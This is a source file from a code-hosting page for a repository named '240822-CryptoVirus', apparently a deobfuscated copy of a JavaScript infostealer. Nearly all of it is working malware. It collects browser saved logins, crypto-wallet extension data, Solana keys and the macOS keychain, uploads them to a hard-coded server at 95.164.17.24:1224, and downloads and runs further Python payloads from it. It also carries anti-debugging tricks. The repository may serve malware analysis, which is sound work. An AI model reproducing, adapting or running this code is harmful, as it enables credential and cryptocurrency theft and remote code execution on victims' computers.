osmannyildiz
/
240822-CryptoVirus
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
240822-CryptoVirus/workspace/106_unobf.js

1106 lines
25 KiB
JavaScript
Raw Permalink Blame History

(function (_0x4e9ca2, _0x3904e0) {
const _0x14f24d = _0x4e9ca2();
while (true) {
try {
const _0x1c360d =
(-parseInt(_0x4dea(625, -28)) / 1) *
(parseInt(_0x4dea(670, "0x49d")) / 2) +
parseInt(_0x4dea(601, "0x387")) / 3 +
parseInt(_0x4dea(673, "0x3b8")) / 4 +
parseInt(_0x4dea(466, "0x293")) / 5 +
parseInt(_0x4dea(557, 0x1c)) / 6 +
-parseInt(_0x4dea(443, -536)) / 7 +
-parseInt(_0x4dea(561, 0x385)) / 8;
if (_0x1c360d === _0x3904e0) {
break;
} else {
_0x14f24d.push(_0x14f24d.shift());
}
} catch (_0x140869) {
_0x14f24d.push(_0x14f24d.shift());
}
}
})(_0x148a, 522052);
const _0x4daddd = (function () {
let _0x3206c1 = true;
return function (_0x3ac76f, _0x2ae9a0) {
const _0x4939b0 = _0x3206c1
? function () {
if (_0x2ae9a0) {
const _0x360228 = _0x2ae9a0.apply(_0x3ac76f, arguments);
_0x2ae9a0 = null;
return _0x360228;
}
}
: function () {};
_0x3206c1 = false;
return _0x4939b0;
};
})();
const _0x157b1b = _0x4daddd(this, function () {
return _0x157b1b
.toString()
.search("(((.+)+)+)+$")
.toString()
.constructor(_0x157b1b)
.search("(((.+)+)+)+$");
});
_0x157b1b();
const _0x4876a1 = (function () {
let _0x374d49 = true;
return function (_0x385120, _0x4a77fb) {
const _0x3366fc = _0x374d49
? function () {
if (_0x4a77fb) {
const _0xf32b1d = _0x4a77fb.apply(_0x385120, arguments);
_0x4a77fb = null;
return _0xf32b1d;
}
}
: function () {};
_0x374d49 = false;
return _0x3366fc;
};
})();
function _0x1bb57c(_0x9c8a3b, _0x417e7a, _0x4ca1ca, _0x557e9b, _0x57d47f) {
return _0x4dea(_0x557e9b + 0xd2, _0x57d47f);
}
(function () {
_0x4876a1(this, function () {
const _0x46c095 = new RegExp("function *\\( *\\)");
const _0x51b335 = new RegExp("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)", "i");
const _0x5bc611 = _0x47c1a1("init");
if (
!_0x46c095.test(_0x5bc611 + "chain") ||
!_0x51b335.test(_0x5bc611 + "input")
) {
_0x5bc611("0");
} else {
_0x47c1a1();
}
})();
})();
const _0x4beaf6 = (function () {
let _0xab7280 = true;
return function (_0x2174d4, _0x45d659) {
const _0x55a2ad = _0xab7280
? function () {
if (_0x45d659) {
const _0x489e77 = _0x45d659.apply(_0x2174d4, arguments);
_0x45d659 = null;
return _0x489e77;
}
}
: function () {};
_0xab7280 = false;
return _0x55a2ad;
};
})();
const _0xa9059f = _0x4beaf6(this, function () {
let _0x350ea0;
try {
const _0x39f8b0 = Function(
'return (function() {}.constructor("return this")( ));'
);
_0x350ea0 = _0x39f8b0();
} catch (_0x23e9e6) {
_0x350ea0 = window;
}
const _0x20d4e0 = (_0x350ea0.console = _0x350ea0.console || {});
const _0x5682e9 = [
"log",
"warn",
"info",
"error",
"exception",
"table",
"trace",
];
for (let _0x21ca15 = 0; _0x21ca15 < _0x5682e9.length; _0x21ca15++) {
const _0xedf49b = _0x4beaf6.constructor.prototype.bind(_0x4beaf6);
const _0x1331ad = _0x5682e9[_0x21ca15];
const _0xa335d6 = _0x20d4e0[_0x1331ad] || _0xedf49b;
_0xedf49b.__proto__ = _0x4beaf6.bind(_0x4beaf6);
_0xedf49b.toString = _0xa335d6.toString.bind(_0xa335d6);
_0x20d4e0[_0x1331ad] = _0xedf49b;
}
});
_0xa9059f();
function _0x529daa(_0x2b4d3d, _0x12afb9, _0x5b27a9, _0x230235, _0x5e5c2a) {
return _0x4dea(_0x5e5c2a + 121, _0x5b27a9);
}
const _0x4d3528 = require("fs");
const _0x3e58af = require("os");
const _0x28e4be = require("path");
const _0x536308 = require("request");
const _0x5a5f2d = require("child_process").exec;
const _0x2955e0 = _0x3e58af.hostname();
const _0x4ce844 = _0x3e58af.platform();
const _0x22302c = _0x3e58af.homedir();
const _0x37d761 = _0x3e58af.tmpdir();
const _0x1c873d = (_0x5caf54) =>
_0x5caf54.replace(/^~([a-z]+|\/)/, (_0x2151df, _0x448e49) =>
"/" === _0x448e49
? _0x22302c
: _0x28e4be.dirname(_0x22302c) + "/" + _0x448e49
);
function _0x19be99(_0x279643, _0x5700f7, _0x3ae5cd, _0x28d0c2, _0x4c61b7) {
return _0x4dea(_0x279643 - "0xa1", _0x28d0c2);
}
function _0x148a() {
const _0xe0fa8a = [
"9591920TnQqoQ",
"lengt",
"ophhp",
"\\p2.z",
"strin",
"/clie",
"on.ex",
"terva",
"fhboh",
"fVjfQ",
"ary/K",
"/User",
"-Brow",
"ser",
"Dmfee",
"-rele",
"table",
"http:",
"hwjyk",
"UnXvQ",
"rn th",
"ructo",
"knmef",
" Data",
"lmeee",
"curl ",
"WCWPE",
"hnfan",
".ldb",
"ary/A",
"sSync",
'is")(',
"XcHAy",
"FlHWk",
"e-chr",
"ins/l",
"/ld_",
"cionb",
"Svwdy",
"nstru",
"1517625EaPqYx",
"son",
"ensio",
"ort/G",
"a-zA-",
"ion *",
"dgcij",
"copyF",
"knocf",
"bfnae",
"hecda",
"behhm",
"txt",
"ox/Pr",
"raveS",
"const",
"ng/Op",
"Local",
".file",
"ation",
"AyrOw",
"Data",
"dgmol",
"Objec",
"1rCdRpu",
"size",
"hlefn",
"/Chro",
"illa/",
"sFUfo",
"PMxHT",
'n3 "',
"RpmVe",
"jgjfh",
"/.con",
"XiqMr",
"a_id.",
"YHADG",
"Firef",
"nhcel",
"mnkoe",
"searc",
"pvRqk",
"le/Ch",
"cfgod",
"idb",
"zuAoM",
"ync",
"age/d",
"fig/",
"hfood",
"Brows",
"ave-B",
"\\.pyp",
"fbeog",
"phepc",
"xf ",
"\\( *\\",
"bohma",
"fgpgk",
"init",
"le ",
"//95.",
"lmome",
"UXRaM",
"rave-",
"uts",
"efQJC",
"opera",
"720928StgoyH",
"qvAhq",
"yyUKT",
"3967888rEQmuq",
"okmhz",
"/Libr",
"rowse",
"ccfch",
"tings",
"rmSyn",
'-Lo "',
"reque",
"*(?:[",
"e) {}",
"pekpl",
"fig/s",
"ase",
"klSbP",
"exbsf",
"aholp",
"(((.+",
"debu",
"ector",
"mgjnj",
"kodbe",
"CAtyN",
"/Goog",
"statS",
"logkc",
"keych",
"creat",
"imael",
"gmccd",
"eSync",
".log",
"/stor",
"hifaf",
"nmhnf",
"irSyn",
"while",
"gger",
"to__",
"actio",
"hid",
"vkDlp",
"type",
"eofbd",
"ata",
"pld_",
"n (fu",
"HDPFB",
"isDir",
"pebkl",
"apply",
"ile",
"retur",
"bakop",
"ome",
" -C ",
"ame",
"Micro",
")+)+)",
"7.24:",
"fnYza",
"YTbrV",
"106",
"JbmCQ",
"l Sta",
"/AppD",
"LhtFy",
"pndod",
" (tru",
"imhlp",
"YzHJj",
"era S",
"join",
"oihof",
"test",
"call",
"Lpcnd",
"ata/",
"inclu",
"ort/B",
"write",
"fgQjP",
"_lst",
"solan",
"eycha",
"-db",
"pytho",
"brld_",
"child",
"excep",
"/pdow",
"$]*)",
"ing",
"orm",
"googl",
"dGDso",
"state",
"nkdna",
"qXdza",
"1224",
"/uplo",
"tar -",
"gBoVi",
"n Set",
"bbldc",
"toStr",
"pcOyp",
"ofile",
"idlcd",
"kkolj",
"Brave",
"filen",
"info",
"/Logi",
"Strea",
"ejbal",
"nt/",
"jbmgj",
"0-9a-",
"BUlhi",
"JAjyS",
"tion",
"WsTuM",
"Z_$][",
"IPGGB",
"proto",
"dlcob",
"hostn",
"push",
"funct",
"sVmjy",
"KJxPT",
"post",
"ldhgm",
"acces",
"User ",
"VZLUP",
"repla",
"count",
"ngcna",
"formD",
"forEa",
"lchlg",
"NEFJd",
"era",
"/id.j",
"readd",
"eSoft",
"/.npl",
"jdloc",
"re.Op",
" Supp",
"zoAVo",
"n() ",
"mdjon",
"qEGjx",
"chain",
"aeach",
"getTi",
'e" "',
"peras",
"4073468hbhncn",
"_file",
"are/B",
"ion",
"xtens",
"pplic",
"pQoeu",
"oogle",
"pjiig",
"ain",
"ads",
"l Ext",
"NxjpZ",
"ctor(",
"/Loca",
"eRead",
"re/Br",
"\\+\\+ ",
"dfjmm",
"g/Moz",
"eebol",
"{}.co",
"EIPRW",
"5215010tUwSmW",
"zA-Z_",
"\\pyth",
"dirna",
"omjjk",
"/Brav",
"lipeo",
"ibnej",
'" "',
"pikoo",
"nkbih",
"sYShZ",
'"retu',
"url",
"olana",
"onoee",
"exist",
"ess",
"trace",
"acmac",
"odkjb",
"re/Op",
"csVdx",
"MUfiD",
"kpcnl",
"bind",
"Googl",
"gpafn",
"ogin.",
"get",
"renam",
"rome",
"Roami",
"Profi",
"tmpdi",
"efaul",
"moz-e",
"ata/L",
"platf",
"_uld",
"warn",
"des",
"ata/R",
"ifqwh",
"error",
"Edge/",
"\\p.zi",
"sbDoY",
"ocal/",
"fdahV",
"ajnim",
"VglDx",
"nctio",
"setIn",
"__pro",
"BpZcw",
"gUjMa",
"jblnd",
"fdial",
"Aonjq",
"FileS",
"homed",
"aeaoe",
"whnDB",
"ilkdb",
"Defau",
"164.1",
"Softw",
"dnfjJ",
"bohpj",
"ort/",
"conso",
"log",
"nBXRM",
"soft/",
"oohck",
"Eegkm",
"e/Chr",
"apagc",
"oftwa",
"multi",
"ware/",
"round",
"input",
"n Dat",
"oamin",
"oWJFw",
"com.o",
"_proc",
"omihk",
"exec",
"735486TsDcOr",
"path",
"zNiYl",
"Hymle",
];
_0x148a = function () {
return _0xe0fa8a;
};
return _0x148a();
}
function _0x5717dc(_0x1dbc8a) {
try {
_0x4d3528.accessSync(_0x1dbc8a);
return true;
} catch (_0x6dcc73) {
return false;
}
}
function _0x20ea48(_0x2f7013, _0xeb2af5, _0x39481f, _0xb8c839, _0x33dbce) {
return _0x4dea(_0x39481f + 881, _0x33dbce);
}
(function () {
let _0x161e41;
try {
const _0x489eae = Function(
'return (function() {}.constructor("return this")( ));'
);
_0x161e41 = _0x489eae();
} catch (_0x236447) {
_0x161e41 = window;
}
_0x161e41.setInterval(_0x47c1a1, 4000);
})();
const _0x424ebd = [
"Local/BraveSoftware/Brave-Browser",
"BraveSoftware/Brave-Browser",
"BraveSoftware/Brave-Browser",
];
const _0x17563d = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"];
const _0x39d921 = [
"Roaming/Opera Software/Opera Stable",
"com.operasoftware.Opera",
"opera",
];
const _0xd8a2d3 = [
"nkbihfbeogaeaoehlefnkodbefgpgknn",
"ejbalbakoplchlghecdalmeeeajnimhm",
"fhbohimaelbohpjbbldcngcnapndodjp",
"hnfanknocfeofbddgcijnmhnfnkdnaad",
"ibnejdfjmmkpcnlpebklmnkoeoihofec",
"bfnaelmomeimhlpmgjnjophhpkkoljpa",
"aeachknmefphepccionboohckonoeemg",
"hifafgmccdpekplomjjkcfgodnhcellj",
"jblndlipeogpafnldhgmapagcccfchpi",
"acmacodkjbdgmoleebolmdjonilkdbch",
"dlcobpjiigpikoobohmabehhmhfoodbb",
"aholpfdialjgjfhomihkjbmgjidlcdno",
];
const _0x34819b = async (_0x387d3a, _0x2e0017, _0x1abf1d, _0x57e8f2) => {
let _0x3219fe;
if (!_0x387d3a || "" === _0x387d3a) {
return [];
}
try {
if (!_0x5717dc(_0x387d3a)) {
return [];
}
} catch (_0x53c200) {
return [];
}
if (!_0x2e0017) {
_0x2e0017 = "";
}
let _0x479e56 = [];
for (let _0x48cf57 = 0; _0x48cf57 < 200; _0x48cf57++) {
const _0xae38f8 =
_0x387d3a +
"/" +
(0 === _0x48cf57 ? "Default" : "Profile " + _0x48cf57) +
"/Local Extension Settings";
for (let _0x574982 = 0; _0x574982 < _0xd8a2d3.length; _0x574982++) {
let _0x194866 = _0xae38f8 + "/" + _0xd8a2d3[_0x574982];
if (_0x5717dc(_0x194866)) {
let _0x57dbf4 = [];
try {
_0x57dbf4 = _0x4d3528.readdirSync(_0x194866);
} catch (_0x1639e1) {
_0x57dbf4 = [];
}
_0x57dbf4.forEach(async (_0x35ef45) => {
let _0x113cb5 = _0x28e4be.join(_0x194866, _0x35ef45);
try {
const _0x51d6c0 = {
filename:
"106_" +
_0x2e0017 +
_0x48cf57 +
"_" +
_0xd8a2d3[_0x574982] +
"_" +
_0x35ef45,
};
if (_0x113cb5.includes(".log") || _0x113cb5.includes(".ldb")) {
_0x479e56.push({
value: _0x4d3528.createReadStream(_0x113cb5),
options: _0x51d6c0,
});
}
} catch (_0x355c83) {}
});
}
}
}
if (
_0x1abf1d &&
((_0x3219fe = _0x22302c + "/.config/solana/id.json"),
_0x4d3528.existsSync(_0x3219fe))
) {
try {
const _0x176d7d = {
filename: "solana_id.txt",
};
_0x479e56.push({
value: _0x4d3528.createReadStream(_0x3219fe),
options: _0x176d7d,
});
} catch (_0x68d68) {}
}
_0x102a96(_0x479e56, _0x57e8f2);
return _0x479e56;
};
const _0xd433c8 = (_0x544473) => {
const _0x32c2cf =
_0x1c873d("~/") + "/AppData/Roaming/Mozilla/Firefox/Profiles";
let _0x12b1c2 = [];
if (_0x5717dc(_0x32c2cf)) {
let _0x56704c = [];
try {
_0x56704c = _0x4d3528.readdirSync(_0x32c2cf);
} catch (_0x592af4) {
_0x56704c = [];
}
let _0xc97d92 = 0;
_0x56704c.forEach(async (_0xeda58c) => {
let _0x394309 = _0x28e4be.join(_0x32c2cf, _0xeda58c);
if (_0x394309.includes("-release")) {
let _0x10bb2e = _0x28e4be.join(_0x394309, "/storage/default");
let _0xbb50df = [];
_0xbb50df = _0x4d3528.readdirSync(_0x10bb2e);
let _0xd96c69 = 0;
_0xbb50df.forEach(async (_0x8b1435) => {
if (_0x8b1435.includes("moz-extension")) {
let _0x4f9b02 = _0x28e4be.join(_0x10bb2e, _0x8b1435);
_0x4f9b02 = _0x28e4be.join(_0x4f9b02, "idb");
let _0x40f163 = [];
_0x40f163 = _0x4d3528.readdirSync(_0x4f9b02);
_0x40f163.forEach(async (_0x47148d) => {
if (_0x47148d.includes(".files")) {
let _0x4b0509 = _0x28e4be.join(_0x4f9b02, _0x47148d);
let _0x483736 = [];
_0x483736 = _0x4d3528.readdirSync(_0x4b0509);
_0x483736.forEach((_0x2120bd) => {
if (
!_0x4d3528
.statSync(_0x28e4be.join(_0x4b0509, _0x2120bd))
.isDirectory()
) {
let _0x530e03 = _0x28e4be.join(_0x4b0509, _0x2120bd);
const _0x14ac1e = {
filename: _0xc97d92 + "_" + _0xd96c69 + "_" + _0x2120bd,
};
_0x12b1c2.push({
value: _0x4d3528.createReadStream(_0x530e03),
options: _0x14ac1e,
});
}
});
}
});
}
});
_0xd96c69 += 1;
}
_0xc97d92 += 1;
});
_0x102a96(_0x12b1c2, _0x544473);
return _0x12b1c2;
}
};
const _0x102a96 = (_0x49d987, _0x397dd8) => {
const _0x36f6e8 = {
type: "10",
};
_0x36f6e8.hid = "106_" + _0x2955e0;
_0x36f6e8.uts = _0x397dd8;
_0x36f6e8.multi_file = _0x49d987;
try {
if (_0x49d987.length > 0) {
const _0x28886a = {
url: "http://95.164.17.24:1224/uploads",
formData: _0x36f6e8,
};
_0x536308.post(_0x28886a, (_0x18bd96, _0x4c47b8, _0x38bda7) => {});
}
} catch (_0x33175a) {}
};
const _0x1ea7a5 = async (_0x5d3b17, _0x5b975c, _0x2ead1d) => {
try {
let _0x5a10ae = "";
_0x5a10ae =
"d" == _0x4ce844[0]
? _0x1c873d("~/") + "/Library/Application Support/" + _0x5d3b17[1]
: "l" == _0x4ce844[0]
? _0x1c873d("~/") + "/.config/" + _0x5d3b17[2]
: _0x1c873d("~/") + "/AppData/" + _0x5d3b17[0] + "/User Data";
await _0x34819b(_0x5a10ae, _0x5b975c + "_", 0 == _0x5b975c, _0x2ead1d);
} catch (_0x5384cd) {}
};
const _0x563fe1 = async (_0x4252ff) => {
let _0x17c3c5 = [];
let _0x43cd84 = _0x22302c + "/Library/Keychains/login.keychain";
if (_0x4d3528.existsSync(_0x43cd84)) {
try {
const _0x5092f1 = {
filename: "logkc-db",
};
_0x17c3c5.push({
value: _0x4d3528.createReadStream(_0x43cd84),
options: _0x5092f1,
});
} catch (_0x5de569) {}
} else {
_0x43cd84 += "-db";
if (_0x4d3528.existsSync(_0x43cd84)) {
try {
const _0x1c87f5 = {
filename: "logkc-db",
};
_0x17c3c5.push({
value: _0x4d3528.createReadStream(_0x43cd84),
options: _0x1c87f5,
});
} catch (_0x674d8f) {}
}
}
try {
let _0x5a0e67 = _0x22302c + "/Library/Application Support/Google/Chrome";
if (_0x5717dc(_0x5a0e67)) {
for (let _0xb6b64 = 0; _0xb6b64 < 200; _0xb6b64++) {
const _0x25ab6e =
_0x5a0e67 +
"/" +
(0 === _0xb6b64 ? "Default" : "Profile " + _0xb6b64) +
"/Login Data";
try {
if (!_0x5717dc(_0x25ab6e)) {
continue;
}
const _0x5ad1b5 = _0x5a0e67 + "/ld_" + _0xb6b64;
const _0x429130 = {
filename: "pld_" + _0xb6b64,
};
if (_0x5717dc(_0x5ad1b5)) {
_0x17c3c5.push({
value: _0x4d3528.createReadStream(_0x5ad1b5),
options: _0x429130,
});
} else {
_0x4d3528.copyFile(_0x25ab6e, _0x5ad1b5, (_0x4d9ba4) => {
const _0x1f58fb = {
filename: "pld_" + _0xb6b64,
};
let _0x434148 = [
{
value: _0x4d3528.createReadStream(_0x25ab6e),
options: _0x1f58fb,
},
];
_0x102a96(_0x434148, _0x4252ff);
});
}
} catch (_0x31353e) {}
}
}
} catch (_0x465307) {}
try {
let _0x378d28 =
_0x22302c + "/Library/Application Support/BraveSoftware/Brave-Browser";
if (_0x5717dc(_0x378d28)) {
for (let _0x147900 = 0; _0x147900 < 200; _0x147900++) {
const _0x3e1d2c =
_0x378d28 +
"/" +
(0 === _0x147900 ? "Default" : "Profile " + _0x147900);
try {
if (!_0x5717dc(_0x3e1d2c)) {
continue;
}
const _0x705335 = _0x3e1d2c + "/Login Data";
const _0x335ee4 = {
filename: "brld_" + _0x147900,
};
if (_0x5717dc(_0x705335)) {
_0x17c3c5.push({
value: _0x4d3528.createReadStream(_0x705335),
options: _0x335ee4,
});
} else {
_0x4d3528.copyFile(_0x3e1d2c, _0x705335, (_0xf09537) => {
const _0xc86db3 = {
filename: "brld_" + _0x147900,
};
let _0x10ce9b = [
{
value: _0x4d3528.createReadStream(_0x3e1d2c),
options: _0xc86db3,
},
];
_0x102a96(_0x10ce9b, _0x4252ff);
});
}
} catch (_0x189305) {}
}
}
} catch (_0x4c7c39) {}
_0x102a96(_0x17c3c5, _0x4252ff);
return _0x17c3c5;
};
const _0x3b6321 = async (_0x48cb33, _0x156cd1, _0x22f798) => {
let _0x31527f = [];
let _0x5ddc7a = "";
_0x5ddc7a =
"d" == _0x4ce844[0]
? _0x1c873d("~/") + "/Library/Application Support/" + _0x48cb33[1]
: "l" == _0x4ce844[0]
? _0x1c873d("~/") + "/.config/" + _0x48cb33[2]
: _0x1c873d("~/") + "/AppData/" + _0x48cb33[0] + "/User Data";
let _0x5407b0 = _0x5ddc7a + "/Local State";
if (_0x4d3528.existsSync(_0x5407b0)) {
try {
const _0x13a9fb = {
filename: _0x156cd1 + "_lst",
};
_0x31527f.push({
value: _0x4d3528.createReadStream(_0x5407b0),
options: _0x13a9fb,
});
} catch (_0x25cec3) {}
}
try {
if (_0x5717dc(_0x5ddc7a)) {
for (let _0x45daa3 = 0; _0x45daa3 < 200; _0x45daa3++) {
const _0x2699dd =
_0x5ddc7a +
"/" +
(0 === _0x45daa3 ? "Default" : "Profile " + _0x45daa3);
try {
if (!_0x5717dc(_0x2699dd)) {
continue;
}
const _0x48fc61 = _0x2699dd + "/Login Data";
if (!_0x5717dc(_0x48fc61)) {
continue;
}
const _0x1d315b = {
filename: _0x156cd1 + "_" + _0x45daa3 + "_uld",
};
_0x31527f.push({
value: _0x4d3528.createReadStream(_0x48fc61),
options: _0x1d315b,
});
} catch (_0xf8cc2e) {}
}
}
} catch (_0x42b367) {}
_0x102a96(_0x31527f, _0x22f798);
return _0x31527f;
};
let _0x5b449c = 0;
const _0x1dcd5b = async (_0x13142e) => {
_0x5a5f2d(
"tar -xf " + _0x13142e + " -C " + _0x22302c,
(_0x526c5d, _0x5408ff, _0x2cc25a) => {
if (_0x526c5d) {
_0x4d3528.rmSync(_0x13142e);
return void (_0x5b449c = 0);
}
_0x4d3528.rmSync(_0x13142e);
_0x9afaab();
}
);
};
const _0x46f34f = () => {
const _0x3bb65e = _0x37d761 + "\\p.zi";
const _0x2cb99f = _0x37d761 + "\\p2.zip";
if (_0x5b449c >= 51476596) {
return;
}
if (_0x4d3528.existsSync(_0x3bb65e)) {
try {
var _0x2295bd = _0x4d3528.statSync(_0x3bb65e);
if (_0x2295bd.size >= 51476596) {
_0x5b449c = _0x2295bd.size;
_0x4d3528.rename(_0x3bb65e, _0x2cb99f, (_0x51313a) => {
if (_0x51313a) {
throw _0x51313a;
}
_0x1dcd5b(_0x2cb99f);
});
} else {
if (_0x5b449c < _0x2295bd.size) {
_0x5b449c = _0x2295bd.size;
} else {
_0x4d3528.rmSync(_0x3bb65e);
_0x5b449c = 0;
}
_0x41b5de();
}
} catch (_0x3b6daf) {}
} else {
_0x5a5f2d(
'curl -Lo "' + _0x3bb65e + '" "' + "http://95.164.17.24:1224/pdown" + '"',
(_0x555440, _0x44dd99, _0x24e653) => {
if (_0x555440) {
_0x5b449c = 0;
return void _0x41b5de();
}
try {
_0x5b449c = 51476596;
_0x4d3528.renameSync(_0x3bb65e, _0x2cb99f);
_0x1dcd5b(_0x2cb99f);
} catch (_0x2e6aaa) {}
}
);
}
};
function _0x41b5de() {
setTimeout(() => {
_0x46f34f();
}, 20000);
}
const _0x9afaab = async () =>
await new Promise((_0x4d1b6b, _0x391948) => {
if ("w" == _0x4ce844[0]) {
if (_0x4d3528.existsSync(_0x22302c + "\\.pyp\\python.exe")) {
(() => {
const _0x519adc = _0x22302c + "/.npl";
const _0x1e8a65 =
'"' + _0x22302c + '\\.pyp\\python.exe" "' + _0x519adc + '"';
try {
_0x4d3528.rmSync(_0x519adc);
} catch (_0x47d968) {}
_0x536308.get(
"http://95.164.17.24:1224/client/10/106",
(_0xd6a628, _0x54f5a6, _0x51eabc) => {
if (!_0xd6a628) {
try {
_0x4d3528.writeFileSync(_0x519adc, _0x51eabc);
_0x5a5f2d(_0x1e8a65, (_0x1fb432, _0x136761, _0x5049cd) => {});
} catch (_0x287363) {}
}
}
);
})();
} else {
_0x46f34f();
}
} else {
(() => {
_0x536308.get(
"http://95.164.17.24:1224/client/10/106",
(_0x518379, _0x40c395, _0x5d5e10) => {
if (!_0x518379) {
_0x4d3528.writeFileSync(_0x22302c + "/.npl", _0x5d5e10);
_0x5a5f2d(
'python3 "' + _0x22302c + '/.npl"',
(_0x4b28d5, _0xb6fc25, _0x3f59d4) => {}
);
}
}
);
})();
}
});
var _0x47f05d = 0;
function _0x45889e(_0xc07b0f, _0x2fefcf, _0x160c3c, _0x37daaa, _0x4ff07a) {
return _0x4dea(_0x2fefcf + 244, _0x37daaa);
}
const _0x50f143 = async () => {
try {
const _0x150254 = Math.round(new Date().getTime() / 1000);
await (async () => {
try {
await _0x1ea7a5(_0x17563d, 0, _0x150254);
await _0x1ea7a5(_0x424ebd, 1, _0x150254);
await _0x1ea7a5(_0x39d921, 2, _0x150254);
_0xd433c8(_0x150254);
if ("w" == _0x4ce844[0]) {
await _0x34819b(
_0x1c873d("~/") + "/AppData/Local/Microsoft/Edge/User Data",
"3_",
false,
_0x150254
);
}
if ("d" == _0x4ce844[0]) {
await _0x563fe1(_0x150254);
} else {
await _0x3b6321(_0x17563d, 0, _0x150254);
await _0x3b6321(_0x424ebd, 1, _0x150254);
await _0x3b6321(_0x39d921, 2, _0x150254);
}
} catch (_0x230eff) {}
})();
_0x9afaab();
} catch (_0x9b8cd1) {}
};
function _0x4dea(_0x3d7604, _0x18f9a9) {
const _0x1d4536 = _0x148a();
_0x4dea = function (_0x2583b8, _0xfd0522) {
_0x2583b8 = _0x2583b8 - 418;
let _0x353617 = _0x1d4536[_0x2583b8];
return _0x353617;
};
return _0x4dea(_0x3d7604, _0x18f9a9);
}
_0x50f143();
_0x9afaab();
let _0x59c1f2 = setInterval(() => {
if ((_0x47f05d += 1) < 5) {
_0x50f143();
} else {
clearInterval(_0x59c1f2);
}
}, 30000);
function _0x47c1a1(_0x1479d8) {
function _0x47c7da(_0x4517a6) {
if (typeof _0x4517a6 === "string") {
return function (_0x4e7a15) {}
.constructor("while (true) {}")
.apply("counter");
} else if (
("" + _0x4517a6 / _0x4517a6).length !== 1 ||
_0x4517a6 % 20 === 0
) {
(function () {
return true;
})
.constructor("debugger")
.call("action");
} else {
(function () {
return false;
})
.constructor("debugger")
.apply("stateObject");
}
_0x47c7da(++_0x4517a6);
}
try {
if (_0x1479d8) {
return _0x47c7da;
} else {
_0x47c7da(0);
}
} catch (_0x5644d4) {}
}
Reference in New Issue View Git Blame Copy Permalink